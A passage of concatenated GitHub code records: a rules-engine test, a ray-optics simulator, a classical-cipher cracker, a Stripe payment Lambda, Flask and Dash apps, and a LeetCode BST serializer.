self.value = 5\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x == y\")\n\n identical_object = object()\n non_identical_object = object()\n\n self.engine.add_rule(\n \"x is y\",\n p.identical, identical_object, transformer_return_value(True)\n )\n\n self.rule_set = \"x is y\"\n self.value = identical_object\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x is y\")\n\n self.engine.add_rule(\n \"x != y\",\n p.not_equal, 5, transformer_return_value(True)\n )\n\n self.rule_set = \"x != y\"\n self.value = 10\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x != y\")\n\n self.engine.add_rule(\n \"x is not y\",\n p.not_identical, identical_object, transformer_return_value(True)\n )\n\n self.rule_set = \"x is not y\"\n self.value = non_identical_object\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x is not y\")\n\n self.engine.add_rule(\n \"x isinstance y\",\n p.is_instance, str, transformer_return_value(True)\n )\n\n self.rule_set = \"x isinstance y\"\n self.value = \"abcd\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: x isinstance y\")\n\n self.engine.add_rule(\n \"x not isinstance y\",\n p.is_not_instance, int, transformer_return_value(True)\n )\n\n self.rule_set = \"x not isinstance y\"\n self.value = \"abcd\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"FALSE: not x isinstance y\")\n\n def test_transformers(self):\n \"\"\"\n Bundled transformers\n \"\"\"\n\n def predicate_true(*args):\n return True\n\n def return_true():\n return True\n\n def predicate_is_true(value, comparable):\n return value is True\n\n self.engine.add_rule(\n \"stop\", predicate_true, \"\", t.trans_stop\n )\n\n self.rule_set = \"stop\"\n result = self.loop.run_until_complete(self.do_run())\n assert_equal(result, None, \"Failed: trans_stop\")\n\n self.engine.add_rule(\n \"factory_return\", predicate_true, \"\", t.factory_trans_return(True)\n )\n\n self.rule_set = \"factory_return\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"Failed: factory_trans_return\")\n\n self.engine.add_rule(\n \"factory_return_call\", predicate_true, \"\",\n t.factory_trans_return_call(return_true)\n )\n\n self.rule_set = \"factory_return_call\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"Failed: factory_return_call\")\n\n self.engine.add_rule(\n \"continue\", predicate_true, \"\", t.trans_continue\n )\n self.engine.add_rule(\n \"continue\", predicate_true, \"\", t.factory_trans_return(True)\n )\n\n self.rule_set = \"continue\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"Failed: trans_continue\")\n\n self.engine.add_rule(\n \"factory_trans_continue\", predicate_true, \"\",\n t.factory_trans_continue(True)\n )\n self.engine.add_rule(\n \"factory_trans_continue\", predicate_is_true, \"\",\n t.factory_trans_return(True)\n )\n\n self.rule_set = \"factory_trans_continue\"\n result = self.loop.run_until_complete(self.do_run())\n assert_true(result, \"Failed: factory_trans_continue\")\n\n self.engine.add_rule(\n \"factory_trans_continue_call\", predicate_true, \"\",\n t.factory_trans_continue_call(lambda *_, **__: True)\n )\n self.engine.add_rule(\n \"factory_trans_continue_call\", predicate_is_true, \"\",\n t.factory_trans_return(True)\n )\n\n self.rule_set = \"factory_trans_continue_call\"\n result = 
self.loop.run_until_complete(self.do_run())\n        assert_true(result, \"Failed: factory_trans_continue_call\")\n\n    def test_edge_cases(self):\n        self.engine.add_rule(\n            \"Test1\", p.equal, \"\", t.factory_trans_return(True)\n        )\n\n        self.engine.del_rule_set(\"Test1\")\n\n        self.rule_set = \"Test1\"\n        assert_raises(LookupError, self.loop.run_until_complete, self.do_run())\n\n        def predicate_true(*args):\n            return True\n\n        self.engine.add_rule(\n            \"Test2\", predicate_true, \"\", lambda *_, **__: \"derp\"\n        )\n\n        self.rule_set = \"Test2\"\n\n        assert_raises(\n            NotImplementedError, self.loop.run_until_complete, self.do_run()\n        )\n\n        async def async_predicate_true(value, comparable):\n            return True\n\n        async def async_transformer_return_true(value):\n            return TransformerResult.RETURN, True\n\n        self.engine.add_rule(\n            \"Test3\", async_predicate_true, \"\", async_transformer_return_true\n        )\n\n        self.rule_set = \"Test3\"\n        result = self.loop.run_until_complete(self.do_run())\n        assert_true(result, \"Failed: Test3\")\n","repo_name":"UltrosBot/Ultros3K","sub_path":"tests/test_rules.py","file_name":"test_rules.py","file_ext":"py","file_size_in_byte":11012,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
+{"seq_id":"187127558","text":"from array import *\r\narr = array('i',[]) # build an array from values entered by the user\r\nn = int(input(\"enter the length of the array\"))\r\nfor i in range(n): # the loop runs up to the given n\r\n    x= int(input(\"enter the next value\"))\r\n    arr.append(x)\r\nprint(arr) \r\n\r\n\r\nvals = int(input(\"enter the search no: \")) # find the index of the first element equal to the searched number\r\nk=0 # counter used to track the current index\r\nfor e in arr:\r\n    if e==vals:\r\n        print(k)\r\n        break \r\n    k+=1","repo_name":"riddhisharma2019/PYTHON-EXAMPLES","sub_path":"array1.py","file_name":"array1.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"20476065109","text":"#import the Python packages for Lambda to use\nimport os\nimport boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nimport stripe\n\nclient = boto3.client('ssm')\n\n#start our Lambda runtime here \ndef handler(event,context):\n    \n    #Retrieve ANI from inbound callerID\n    callerID = event[\"Details\"][\"ContactData\"][\"CustomerEndpoint\"][\"Address\"]\n    #Retrieve amount\n    amount = float(event[\"Details\"][\"Parameters\"][\"Amount\"])\n    print(f\"Amount: {amount}\")\n    \n    dynamoTable = os.environ['AWS_DYNAMODB']\n    #Establish connection to dynamoDB and retrieve table\n    dynamodb = boto3.resource('dynamodb')\n    table = dynamodb.Table(dynamoTable)\n    \n    #get_item looks up the record whose key matches the ANI of the inbound call and saves it to response\n    response = table.get_item(\n        Key={'phoneNumber': callerID, 'attrib': 'user'}\n    )\n    \n    #Fetch the Stripe API key from SSM and set it before any Stripe call is made\n    ssm_response = client.get_parameter(\n        Name='StripeApiKey',\n        WithDecryption=True\n    )\n\n    stripe.api_key = ssm_response['Parameter']['Value']\n\n    customer = stripe.Customer.retrieve(response['Item']['stripeId'])\n\n    
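# Stripe expects 'amount' as an integer in the smallest currency unit (e.g. cents);\n    # if the contact flow passes dollars, a conversion roughly like the following\n    # (hypothetical, depends on how Amount is encoded) would be needed first:\n    # amount = int(round(amount * 100))\n    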
status","repo_name":"msimpsonnz/aws-misc","sub_path":"connect-pay/functions/makePaymentExisting/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"32734414025","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.widgets as wdg\n\nclass rayon:\n \"\"\" \n Tracé d'un rayon lumineux et détermination des points de contact\n\n ----------\n x : float\n Abscisse du point d'origine du rayon.\n y : float\n Ordonnée du point d'origine du rayon.\n teta : float\n Angle du rayon par rapport à l'axe des abscisses.\n color : str\n Couleur du rayon.\n direction : bool\n Direction de propagation du rayon (True = vers la droite)\n origine : object\n Origine du rayon (None si provient d'une source)\n \"\"\"\n def __init__(self,figure, x =0, y=0, teta=0, color = \"k\", direction = True, origine = None):\n self.x = x #abscisse d'origine\n self.y =y #ordonnée d'origine\n self.teta = teta #angle du rayon par rapport à l'axe des abscisses\n self.color = color #Couleur du rayon\n self.direction = direction #Direction du rayon\n self.origine = origine #Permet de savoir l'origine du rayon (de quel miroir il provient), utile pour le débogage\n \n self.fig, self.ax = figure #Figure sur laquelle tracer\n \n \n \n if self.direction: #Défini le vecteur x conrrespondant a la direction du rayon\n self.x_array = np.linspace(self.x,self.x+20)\n else:\n self.x_array = np.linspace(self.x, self.x-20)\n \n if origine != None:\n self.color=\"C1\"\n \n \n #On appelle la méthode check() permettant de déterminer si le rayon entre en contact avec un miroir\n self.check()\n \n def trace(self):\n #méthode traçant le rayon\n y = (self.x_array-self.x)*np.tan(self.teta) +self.y #vecteur y\n \n self.ax.plot(self.x_array, y,self.color, alpha = 0.2) #plot\n \n def check(self):\n #Méthode vérifiant si le rayon entre en contact avec un obstacle (dioptre ou miroir)\n def fonction(liste):\n #Fonction prenant en entrée la liste des dioptre de la figure vérifiant si le rayon entre en contact avec un dioptre.\n #Si le rayon va vers la gauche, la liste indiquée sera la liste contenant les dioptre parcourue dans le sens inverse.\n \n for dioptre in liste: #Pour tous les dioptres\n \n #Résolution de l'équation\n A = 1+(np.tan(self.teta)**2)\n B = -2*dioptre.c -2*self.x*(np.tan(self.teta)**2)+2*self.y*np.tan(self.teta)\n C = (dioptre.c)**2 + (self.x**2)*(np.tan(self.teta)**2) - 2*self.y*self.x*np.tan(self.teta) + (self.y**2) - (dioptre.r**2)\n\n delta = (B**2)-(4*A*C)\n if delta < 0:\n continue\n\n #On choisi la bonne solution en fonction de l'interface rencontrée\n if dioptre.side:\n X1 = (-B-np.sqrt(delta))/(2*A)\n else:\n X1 = (-B+np.sqrt(delta))/(2*A)\n Y1 = (X1-self.x)*np.tan(self.teta) +self.y\n\n #Sécurité pour éviter de créer un deuxième rayon réfléchi au point de départ d'un rayon réfléchi\n if round(X1,1) == round(self.x,1):\n continue\n\n #On vérifie si le programme n'as pas choisi la mauvaise solution, et que la solution est bien sur l'interface\n if (Y1 > dioptre.min and Y1 < dioptre.max) and (X1 > np.min(dioptre.xc) and X1 < np.max(dioptre.xc)) and X1 < np.max(self.x_array) and X1 > np.min(self.x_array): \n self.x_array = np.linspace(self.x, X1, 100)\n \n #On calcul l'angle de la normale en fonction de l'interface rencontrée\n if dioptre.side:\n teta_rayon = np.pi - np.arctan(Y1/(dioptre.c-X1))\n else:\n teta_rayon = np.arctan(Y1/(X1 - dioptre.c))\n \n #Calcul de l'angle 
entre la normale et le rayon incident\n beta = (np.pi - teta_rayon + self.teta)\n \n #Calcul de l'angle entre la normale et le rayon réfracté\n alpha = np.arcsin((np.sin(beta)*dioptre.n_left)/dioptre.n_right)\n \n\n\n\n if (self.direction and dioptre.side) or (not self.direction and not dioptre.side):\n teta_nouveau = teta_rayon + alpha - np.pi\n else:\n teta_nouveau = -alpha + teta_rayon\n\n\n \n #Création d'un rayon réfracté en fonction du point d'impact et de l'angle calculé précédemment\n lst_ray.append(rayon((self.fig,self.ax),X1,Y1, teta_nouveau, origine = dioptre, direction = self.direction))\n \n #Si le rayon se dirige vers la droite, la liste est parcourue dans son sens normal, sinon dans son sens inverse\n if self.direction:\n fonction(lst_dioptre)\n else:\n fonction(lst_dioptre[::-1])\n\n for miroir in lst_miroir: #Pour chaque miroir existant\n #Résolution de l'équation\n A = 1+(np.tan(self.teta)**2)\n B = -2*(miroir.x-miroir.r) -2*self.x*(np.tan(self.teta)**2)+2*self.y*np.tan(self.teta)\n C = (miroir.x-miroir.r)**2 + (self.x**2)*(np.tan(self.teta)**2) - 2*self.y*self.x*np.tan(self.teta) + (self.y**2) - (miroir.r**2)\n\n delta = (B**2)-(4*A*C)\n\n #Si delta négatif, pas de solution, on passe le tour de boucle\n if delta <0:\n continue\n #Si r>0, la solution est sur la droite du \"cercle\", sinon elle est sur la gauche du \"cercle\"\n if miroir.r>0:\n X1 = (-B+np.sqrt(delta))/(2*A)\n else:\n X1 = (-B-np.sqrt(delta))/(2*A)\n Y1 = (X1-self.x)*np.tan(self.teta) +self.y #Calcul de l'ordonnée du point de contact\n\n if round(X1) == round(self.x): #Sécurité pour éviter de créer un deuxième rayon réfléchi au point de départ d'un rayon réfléchi\n continue\n \n #On vérifie si le programme n'as pas choisi la mauvaise solution, et que la solution est bien sur le miroir\n if Y1 < miroir.max and Y1 > miroir.min and (((self.direction == False) and (self.x > miroir.x)) or ((self.direction == True) and (self.x < miroir.x))) and round(X1,1) >= round(np.min(miroir.xc),1) and round(X1,1) <= round(np.max(miroir.xc),1) and ((X1 <= max(self.x_array) and self.direction) or (X1 >= min(self.x_array) and self.direction == False)):\n self.x_array = np.linspace(self.x,X1,100) #On créé le vecteur x entre le point de départ et d'arrivée\n teta_rayon = np.arcsin(Y1/miroir.r) #On calcule l'angle de la normale\n teta_nouveau = -np.pi + 2*teta_rayon -self.teta #On calcule l'angle du rayon réfléchi\n\n \n teta_nouveau = (teta_nouveau + np.pi) % (2 * np.pi) - np.pi #transforme la valeur de l'angle entre -pi/2,pi/2\n if abs(teta_nouveau) > np.pi/2 : #On définit la direction du rayon en fonction de son angle and abs(teta_nouveau) < 3*np.pi/2\n direction = False\n else:\n direction = True\n #On créé un nouveau rayon (réfléchi) en fonction du point de contact avec le miroir, l'angle et sa direction\n lst_ray.append(rayon((self.fig,self.ax),X1,Y1, teta_nouveau, origine = miroir, direction = direction))\n\n\n \n \n self.trace() #On trace le rayon incident\n\nclass source:\n \"\"\" \n Créé un nombre déterminé de rayon lumineux suivant plusieurs conditions\n Permet de créer une source à l'infinie ou non.\n\n ----------\n x : float\n Abscisse du point d'origine des rayons.\n y : float\n Ordonnée du point d'origine des rayon.\n angle : float\n Angle d'ouverture de la source lorsque la source n'est pas à l'infinie.\n N : int\n Nombre de rayons\n inf : bool\n Source à l'infinie ou non.\n height : str\n Hauteur de répartition des rayons lorsque la source est considérée à l'infinie.\n \"\"\"\n def __init__(self,figure, x, y, 
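# Where the intersection quadratic used in rayon.check() comes from: substituting the\n# ray y = (x - x0)*tan(teta) + y0 into the circle (x - c)**2 + y**2 = r**2 gives\n# A*x**2 + B*x + C = 0 with A = 1 + tan(teta)**2,\n# B = -2*c - 2*x0*tan(teta)**2 + 2*y0*tan(teta) and\n# C = c**2 + x0**2*tan(teta)**2 - 2*x0*y0*tan(teta) + y0**2 - r**2,\n# matching the coefficients above (for mirrors, c = miroir.x - miroir.r).\n\n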
class source:\n    \"\"\" \n    Creates a given number of light rays under several conditions.\n    Allows the source to be at infinity or not.\n\n    ----------\n    x : float\n        Abscissa of the rays' origin.\n    y : float\n        Ordinate of the rays' origin.\n    angle : float\n        Opening angle of the source when the source is not at infinity.\n    N : int\n        Number of rays\n    inf : bool\n        Whether the source is at infinity.\n    height : float\n        Height over which the rays are spread when the source is at infinity.\n    \"\"\"\n    def __init__(self,figure, x, y, angle, N, inf = False, height = 0):\n        self.figure = figure #Figure to draw on\n        self.x = x #x,y position of the source\n        self.y = y\n        self.alpha = angle #Half opening angle of the source\n        self.N = N #Number of rays created by the source\n        self.infiny = inf #Source at infinity\n        self.height = height #Height over which the rays are created in infinity mode\n\n        self.create_ray()\n\n    def create_ray(self):\n        lst_angle = np.linspace(-self.alpha, self.alpha, self.N) #List of angles, one per ray of the source\n\n        if self.infiny: #If the source is at infinity\n            for y in np.linspace(-self.height/2, self.height/2, self.N):\n                lst_ray.append(rayon(self.figure, self.x, y, 0)) #Create a ray with angle 0 rad\n        else:\n            for angle in lst_angle:\n                lst_ray.append(rayon(self.figure, self.x, self.y, angle)) #Otherwise draw a ray with the corresponding angle\n\n\n
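# Sign convention for mirrors (see rayon.check()): the mirror circle is centered at\n# x - r with its vertex at x; r > 0 selects the right-hand root of the quadratic and\n# r < 0 the left-hand one, so the sign of r picks which side of the circle reflects.\n\n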
class miroir:\n    \"\"\" \n    Creates a concave or convex spherical mirror\n\n    ----------\n    fig : matplotlib figure\n        Figure on which to draw the mirror.\n    x : float\n        Position of the mirror on the x-axis.\n    r : float\n        Radius of the mirror.\n    diametre : float\n        Opening angle of the mirror\n    color : str\n        Color of the mirror\n    \"\"\"\n    def __init__(self,fig, x =0, r = 10, diametre = np.pi/3, color =\"k\"):\n        self.x = x #position of the mirror on the x-axis\n        self.diametre = diametre #half opening diameter\n        self.r = r #Radius of the mirror\n        self.color = color #Color of the mirror\n        self.fig, self.ax = fig #Figure to draw the mirror on\n\n        self.max = int #Initialize the max and min variables\n        self.min = int\n\n        self.test = False\n\n        self.trace() #Draw the mirror\n\n    def trace(self):\n        teta = np.linspace(-self.diametre, self.diametre,1000) #teta vector holding the angle of each point of the circle with respect to the x-axis\n        \n        self.xc = self.r*np.cos(teta) - self.r + self.x #x array\n        self.yc = self.r*np.sin(teta) #y array\n\n        #Compute the max and min height of the mirror\n        self.max = np.max(self.yc)\n        self.min = -self.max\n        \n        self.ax.plot(self.xc, self.yc, color = self.color) #draw the mirror\n        #self.ax.plot(self.x - self.r, 0,marker = \"o\", color = self.color) #Draw the center of the mirror\n\n\nclass sous_dioptre:\n    \"\"\" \n    Creates one interface of a biconcave or biconvex lens.\n    See the dioptre class.\n\n    ----------\n    fig : matplotlib figure\n        Figure on which to draw the interface.\n    centre : float\n        center of the circle\n    r : float\n        Radius of the circle.\n    n_left : float\n        refractive index on the left of the interface\n    n_right : float\n        refractive index on the right of the interface\n    side : bool\n        concave side of the lens\n    color : str\n        Color of the interface\n    \"\"\"\n    def __init__(self, fig, centre, r, teta, n_left, n_right, side, color = \"red\"):\n        self.fig, self.ax = fig\n        self.color = color #Color of the interface\n\n        self.side = side #tells which side of the circle is drawn, so that the right solution of the equation can be picked (True = left)\n\n        self.r = r #radius of the circle\n        self.c = centre #center of the circle\n        self.teta = teta #array holding the angles needed to draw the interfaces\n        self.n_left = n_left #refractive index on the left of the surface\n        self.n_right = n_right #refractive index on the right of the surface\n\n        self.trace() #Call the trace method to draw the surface\n\n    def trace(self):\n        self.xc = self.r*np.cos(self.teta)+self.c #x array\n        self.yc = self.r*np.sin(self.teta) #y array\n\n        self.ax.plot(self.xc, self.yc, color = self.color) #draw\n\n        #Compute the max and min height of the interface (used by the condition in the rays' check method)\n        self.max = np.max(self.yc)\n        self.min = -self.max\n\nclass dioptre:\n    \"\"\" \n    Creates the two sous_dioptre interfaces matching the lens parameters.\n\n    ----------\n    fig : matplotlib figure\n        Figure on which to draw the interfaces.\n    x : float\n        center of the lens\n    r : float\n        Radius of the circles.\n    s : float\n        distance between the center of the lens and the vertices of the circles\n    n : float\n        refractive index of the lens\n    type : str\n        lens type (convergent or divergent)\n    color : str\n        Color of the lens\n    \"\"\"\n    def __init__(self,fig, x, r, s,n,type = \"convergent\", color = \"darkturquoise\"):\n        self.fig = fig\n\n        self.x = x #Center of the lens\n        self.r = r #Radius of the interfaces\n        self.s = s #Distance between the center of the lens and the vertices of the interfaces\n        self.n = n #Refractive index of the lens\n        self.color = color #Color of the lens\n        self.type = type #Lens type\n        \n        #If the user does not give a valid lens type, the program raises an error\n        if self.type not in [\"convergent\", \"divergent\"]:\n            raise ValueError(\"{} is not a valid lens type\".format(self.type))\n\n        #Call the method matching the lens type so the interfaces are drawn the right way\n        if self.type == \"convergent\":\n            self.convergent()\n        else:\n            self.divergent()\n\n    def convergent(self):\n        diametre = np.arccos((self.r-self.s)/self.r)\n\n        c1 = self.x + self.r - self.s #Center of the first circle\n        c2 = self.x + self.s - self.r #Center of the second circle\n\n\n        teta1 = np.linspace(-diametre, diametre, 100) #Vectors holding the angles needed for drawing\n        teta2 = np.linspace(-diametre+np.pi, diametre+np.pi, 100)\n\n        #Create the two surfaces\n        lst_dioptre.append(sous_dioptre(fig, c1, self.r, teta2, 1, self.n, True, color = self.color))\n        lst_dioptre.append(sous_dioptre(fig, c2, self.r, teta1, self.n, 1, False, color = self.color))\n\n    def divergent(self):\n        diametre = np.arccos((self.r-self.s)/self.r) #maximum opening angle\n\n        c1 = self.x + self.s + self.r #Center of the first circle\n        c2 = self.x - self.s - self.r #Center of the second circle\n\n        teta1 = np.linspace(-diametre, diametre, 1000) #Vectors holding the angles needed for drawing\n        teta2 = np.linspace(-diametre+np.pi, diametre+np.pi, 1000)\n\n        #Create the two surfaces\n        lst_dioptre.append(sous_dioptre(fig, c2, self.r, teta1, 1,self.n, False, color = self.color))\n        lst_dioptre.append(sous_dioptre(fig, c1, self.r, teta2,self.n, 1, True, color = self.color))\n\n\n
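# Why diametre = arccos((r - s)/r) in convergent()/divergent(): each vertex sits a\n# distance s from the lens center and each circle center a distance r behind its\n# vertex; for the convergent lens the two arcs meet at the rim exactly when\n# r - s - r*cos(diametre) = s - r + r*cos(diametre), i.e. cos(diametre) = (r - s)/r,\n# and the divergent lens reuses the same angle so both surfaces share the same\n# aperture height r*sin(diametre).\n\n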
if __name__ == \"__main__\":\n    fig = plt.subplots() #Create the figure\n\n    #Limits, grid, axis aspect ratio...\n    fig[1].set_xlim(-20,20)\n    fig[1].set_ylim(-15,15)\n    fig[1].grid(True)\n    fig[1].set_aspect(\"equal\")\n\n    #Empty lists to be filled with the objects\n    lst_ray = []\n    lst_miroir = []\n    lst_source = []\n    lst_dioptre = [] #This list is not meant to be filled by the user; the program fills it automatically\n    \n    #Create the mirror and source objects and add them to the matching list\n    lst_miroir.append(miroir(x = 15, r=-15, diametre = np.pi/4, fig = fig, color = \"blue\")) \n    \n    dioptre(fig, 0, 12,0.5,1.38, type = \"divergent\")\n    \n    lst_source.append(source(fig,-10, 0,np.pi/12, 100, inf = True, height = 4))\n\n    \n\n    plt.show()\n\n\n\n","repo_name":"Cozipro/Ray_simulator","sub_path":"Ray_simulator/Ray_simulator.py","file_name":"Ray_simulator.py","file_ext":"py","file_size_in_byte":16125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"14086293086","text":"import logging\nimport string\nimport math\n\nlogger = logging.getLogger(__name__)\n\ndef crack(cipher_txt,dec_func,dictionary,likely_words,ic=False,min_rating=1):\n    \"\"\"\n    Accepts a cipher text and decipher function and deciphers the text\n    looking for likely words. The dictionary should be a lazy function\n    \"\"\"\n    likely_words = likely_words.split(\" \")\n    if not callable(dec_func):\n        logger.error(\"Decipher function is not callable\")\n        raise ValueError(\"dec_func is not callable\")\n\n    results = []\n    for word in dictionary():\n        deciphered = dec_func(cipher_txt,word)\n        if isinstance(deciphered,str):\n            score = rate_output(likely_words,deciphered,ic)\n            if score >= min_rating:\n                results.append((word,deciphered,score))\n\n    #Sort results by the score\n    results = sorted(results,key=lambda x:x[2])\n    for result in results:\n        print(\"Score: {},Key: {}\\n{}\".format(result[2],result[0],result[1]))\n\ndef rate_output(likely_words,cipher,ic=False):\n    \"\"\"\n    Rates an output based on the occurrences of the likely words and, if\n    enabled, the index of coincidence\n    \"\"\"\n    target_ic = 1.73\n    sd = 0.25\n    cipher = cipher.upper()\n    rating = 0\n    for word in likely_words:\n        if word.upper() in cipher:\n            rating += 1\n    if ic:\n        rating *= apply_normal_dist(calculate_ic(cipher),target_ic,sd)\n    return rating\n\ndef calculate_ic(text):\n    \"\"\"\n    Calculates the index of coincidence of a given text; English text\n    should have an IC of ~1.73\n    \"\"\"\n    alphabet = string.ascii_lowercase\n    text = text.lower()\n    new_text = \"\"\n    occurences = {}\n    for c in text:\n        if c in alphabet:\n            new_text += c\n            if c in occurences:\n                occurences[c] += 1\n            else:\n                occurences[c] = 1\n    observed = sum(\n        [occurences[x]*(occurences[x]-1) for x in occurences])\n    random = (1/len(alphabet))*len(new_text)*(len(new_text)-1)\n    return observed/random\n\ndef apply_normal_dist(x,mean,sd):\n    \"\"\"\n    Get the y value for a given x value using the normal distribution\n    with a given mean and standard deviation\n    \"\"\"\n    return (1/(sd*(2*math.pi)**0.5))*math.e**((-(x-mean)**2)/(2*(sd**2)))\n","repo_name":"TomJamesGray/cipher-crack","sub_path":"cipher_crack/crack.py","file_name":"crack.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"17154724880","text":"## main page ##\n### ONTARIO SCHOOLS COVID-19 ANALYSIS ###\n#### PLOTLY DASH APP - VERSION 2.01 ####\n\n##### BY: PETER STANGOLIS #####\n\n## Import the required libraries ##\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\n# Connect to main app.py file\nfrom app import app\nfrom app import server\n\n# Connect to your app pages\nfrom apps import metrics, sch_select\n\n\napp.layout = html.Div([\n    dcc.Location(id='url', refresh=False),\n    html.Div([\n        dcc.Link('(1) Daily Metrics | ', href='/apps/metrics'),\n        dcc.Link('(2) Search by School - Municipality', href='/apps/sch_select'),\n    ], className=\"row\"),\n    html.Div(id='page-content', children=[])\n])\n\n\n
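# Standard Dash multi-page pattern: dcc.Location feeds the current URL into the\n# callback below, which swaps the layout of the matching page module into the\n# 'page-content' Div.\n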
@app.callback(Output('page-content', 'children'),\n              [Input('url', 'pathname')])\ndef display_page(pathname):\n    if pathname == '/apps/metrics':\n        return metrics.layout\n    if pathname == '/apps/sch_select':\n        return sch_select.layout\n    else:\n        return \"Please choose a link above to view dashboard\"\n\n\nif __name__ == '__main__':\n    app.run_server(debug=True)\n","repo_name":"Peterstangolis/ONTSchoolApp_2.0","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"34080699937","text":"import logging\nimport os\nimport os.path\nimport random\n\nimport cherrypy\nimport click\nfrom flask import abort, Blueprint, Flask, jsonify\nfrom flask_caching import Cache\nfrom requestlogger import ApacheFormatter, WSGILogger\nimport opentracing\nfrom flask_opentracing import FlaskTracer\nfrom jaeger_client import Config\nfrom prometheus_flask_exporter import PrometheusMetrics\nimport simplejson as json\nimport slugify\nfrom werkzeug.contrib.fixers import ProxyFix\n\n__version__ = \"0.1.0\"\nTHUMBNAIL_NOT_FOUND = 'http://i.annihil.us/u/prod/marvel/i/mg/b/40/image_not_available'\n\npowersource = Blueprint(\"powersource\", __name__)\ncache = Cache()\nmetrics = PrometheusMetrics(app=None)\n\ncurdir = os.getcwd()\ncharacters = []\nindexes = []\n\n\ndef init_tracer():\n    return Config(\n        config={\n            'logging': True,\n            'local_agent': {\n                'reporting_host': os.getenv(\"JAEGER_HOST\", \"localhost\")\n            },\n            'sampler': {'type': 'const', 'param': 1}\n        }, service_name='powersource', validate=True\n    ).initialize_tracer()\ntracer = FlaskTracer(init_tracer, True, app=powersource)\n\n\ndef load_characters():\n    with open(os.path.join(curdir, \"characters.json\")) as f:\n        characters.extend(json.load(f))\n    for index, c in enumerate(characters):\n        thumbnail = c[\"thumbnail\"]\n        if thumbnail[\"path\"] == THUMBNAIL_NOT_FOUND:\n            continue\n        indexes.append(index)\n\n\n@powersource.route(\"/<int:character_id>\")\n@cache.cached(timeout=600)\ndef index(character_id: int):\n    if character_id not in indexes:\n        return abort(404)\n\n    character = characters[character_id]\n    extension = character[\"thumbnail\"][\"extension\"]\n    img_url = \"{}.{}\".format(\n        slugify.slugify(character[\"name\"]),\n        extension\n    )\n    learn_more_url = None\n    for url in character.get(\"urls\", []):\n        if url[\"type\"] == \"detail\":\n            learn_more_url = url[\"url\"]\n            break\n\n    return jsonify(dict(\n        name=character[\"name\"], description=character[\"description\"],\n        img_url=img_url, learn_more_url=learn_more_url))\n\n\n@powersource.route(\"/random\")\ndef rand() -> str:\n    return jsonify({\"character_id\": random.choice(indexes)})\n\n\n@powersource.route(\"/health\")\ndef health():\n    return \"\", 200\n\n\n@powersource.route(\"/live\")\ndef live():\n    return \"\", 200\n\n\n\ndef initialize_metrics(app: Flask):\n    metrics.init_app(app)\n    metrics.info('powersource', 'Application info', version=__version__)\n\n\ndef initialize_cache(app: Flask):\n    cache.init_app(app, config={'CACHE_TYPE': 'simple'})\n\n\ndef mount_apps(app: Flask):\n    app.register_blueprint(powersource)\n    app.wsgi_app = ProxyFix(app.wsgi_app)\n    wsgiapp = WSGILogger(\n        app.wsgi_app, [logging.StreamHandler()], ApacheFormatter(),\n        propagate=False)\n    cherrypy.tree.graft(wsgiapp, \"/\")\n\n\n\ndef create_app() -> Flask:\n    app = Flask(__name__)\n    app.register_blueprint(powersource)\n    load_characters()\n    initialize_cache(app)\n    initialize_metrics(app)\n    mount_apps(app)\n    return app\n\napp = 
create_app()","repo_name":"chaostoolkit-incubator/community-playground","sub_path":"superpower/powersource/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"21"} +{"seq_id":"30638134770","text":"\"\"\"\nSolution for 449. Serialize and Deserialize BST\nhttps://leetcode.com/problems/serialize-and-deserialize-bst/\n\"\"\"\n\nfrom collections import deque\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Codec:\n \"\"\"\n Serialization is the process of converting a data structure or object into a sequence of bits so that it can be stored in a file or memory buffer, or transmitted across a network connection link to be reconstructed later in the same or another computer environment.\n\n Design an algorithm to serialize and deserialize a binary search tree. There is no restriction on how your serialization/deserialization algorithm should work. You just need to ensure that a binary search tree can be serialized to a string and this string can be deserialized to the original tree structure.\n\n The encoded string should be as compact as possible.\n\n Note: Do not use class member/global/static variables to store states. Your serialize and deserialize algorithms should be stateless.\n\n Submission:\n Runtime: 64 ms, faster than 87.69% of Python3 online submissions for Serialize and Deserialize BST.\n Memory Usage: 17.5 MB, less than 100.00% of Python3 online submissions for Serialize and Deserialize BST.\n \"\"\"\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\n \"\"\"\n return self.postorder_serialize(root)\n\n def preorder_serialize(self, root: TreeNode) -> str:\n \"\"\"\n A pre-order serialization that runs in O(N) in time and O(N) in space\n\n Args:\n root:\n\n Returns:\n\n \"\"\"\n inorder, preorder = [], []\n\n def rec(node):\n if not node:\n return\n preorder.append(str(node.val))\n rec(node.left)\n inorder.append(str(node.val))\n rec(node.right)\n\n rec(root)\n return ','.join(inorder) + ':' + ','.join(preorder)\n\n def postorder_serialize(self, root: TreeNode) -> str:\n \"\"\"\n A postorder serialization solution that runs in O(N) in time and space\n\n Args:\n root:\n\n 